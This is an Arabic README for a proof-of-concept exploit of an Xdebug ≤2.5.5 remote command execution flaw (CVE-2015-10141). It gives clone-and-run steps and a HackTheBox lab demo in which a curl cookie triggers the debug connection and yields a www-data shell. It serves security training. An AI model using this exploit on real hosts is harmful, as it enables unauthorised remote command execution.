
نص برمجي استغلالي (إثبات مفهوم) لـ Xdebug الإصدار 2.5.5 والإصدارات الأقدم (CVE-2015-10141).
استغلال مخصص بلغة Python لثغرة Xdebug الإصدار ≤ 2.5.5 (CVE-2015-10141).
يحتوي هذا المستودع على إثبات المفهوم (PoC) الخاص بي لاستغلال ثغرة تنفيذ الأوامر عن بُعد في Xdebug للإصدارات 2.5.5 والإصدارات الأقدم.
يستغل السكريبت بروتوكول التصحيح غير المُوثَّق المكشوف على المنفذ 9000 لتحقيق تنفيذ الأوامر عن بُعد.
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
عند الطلب، أدخل عنوان IP الهدف الذي يستضيف Xdebug.
توضيح من كتابتي الأخيرة لـ HackTheBox Olympus (متوسطة):
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
تم إنشاء هذا المشروع لأغراض تعليمية فقط.
لا تستخدم هذا الاستغلال ضد الأنظمة دون إذن صريح. لست مسؤولاً عن أي إساءة استخدام لهذا الكود.